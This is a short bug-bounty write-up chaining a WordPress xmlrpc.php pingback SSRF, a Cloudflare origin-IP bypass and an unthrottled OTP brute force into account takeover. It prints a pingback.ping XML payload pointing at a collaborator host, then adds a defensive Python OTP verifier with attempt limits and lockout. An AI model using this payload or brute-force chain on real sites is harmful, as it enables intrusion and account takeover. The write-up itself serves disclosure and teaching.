Tale of 3 vulnerabilities to account takeover!

https://github.com/projectdiscovery/subfinder
pingback.ping method allowed
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>[Burp collaborator link]</string></value>
</param>
<param>
<value><string>[Any valid blog post link]</string></value>
</param>
</params>
</methodCall>
  1. I found an SSRF on the blog page by exploiting xmlrpc.php to get the origin server’s IP,
  2. Used the server’s IP to bypass Cloudflare by reaching the origin server directly, and
  3. Brute-forced the OTP to take over the victim’s account (as rate limiting wasn’t enforced on the server side)
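Step 3 only works because the server lets a client guess a short OTP an unlimited number of times. The following is an added example (not code from the original post or from the affected site) of what the server-side check should have looked like: an OTP verifier that counts wrong guesses per challenge, burns the code and locks the account once the limit is hit, and expires codes after a TTL. The policy values, the account names and the `now` parameter are assumptions made for this example.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Policy values assumed for this example (not from the original post).
OTP_DIGITS = 6
OTP_TTL_SECONDS = 300      # a code is valid for 5 minutes
MAX_ATTEMPTS = 5           # wrong guesses allowed before the code is burned
LOCKOUT_SECONDS = 900      # account is locked for 15 minutes after that


@dataclass
class Challenge:
    code: str
    expires_at: float
    attempts: int = 0


@dataclass
class OtpVerifier:
    """Server-side OTP check; `now` (e.g. time.time()) is passed in for testability."""
    challenges: dict = field(default_factory=dict)
    locked_until: dict = field(default_factory=dict)

    def issue(self, account: str, now: float) -> str:
        if self.locked_until.get(account, 0) > now:
            raise PermissionError("account locked")
        code = f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self.challenges[account] = Challenge(code, now + OTP_TTL_SECONDS)
        return code  # goes to SMS/email in production, never back to the caller

    def verify(self, account: str, guess: str, now: float) -> str:
        """Return 'ok', 'invalid', 'expired' or 'locked'."""
        if self.locked_until.get(account, 0) > now:
            return "locked"
        ch = self.challenges.get(account)
        if ch is None or now > ch.expires_at:
            self.challenges.pop(account, None)
            return "expired"
        ch.attempts += 1
        # Constant-time compare so response timing does not leak digit matches.
        if hmac.compare_digest(ch.code.encode(), guess.encode()):
            del self.challenges[account]  # single use
            return "ok"
        if ch.attempts >= MAX_ATTEMPTS:
            # Burn the code and lock the account: sweeping the 10**6 code space
            # now costs a fresh challenge every MAX_ATTEMPTS guesses plus a lockout.
            del self.challenges[account]
            self.locked_until[account] = now + LOCKOUT_SECONDS
            return "locked"
        return "invalid"
```

Without the attempt counter the full 6-digit space falls to at most one million requests; with it, a guessing client is stopped after MAX_ATTEMPTS and the correct code is no longer accepted for that challenge.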

Security Engineer @Microsoft | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc
Avinash Jain (@logicbomb)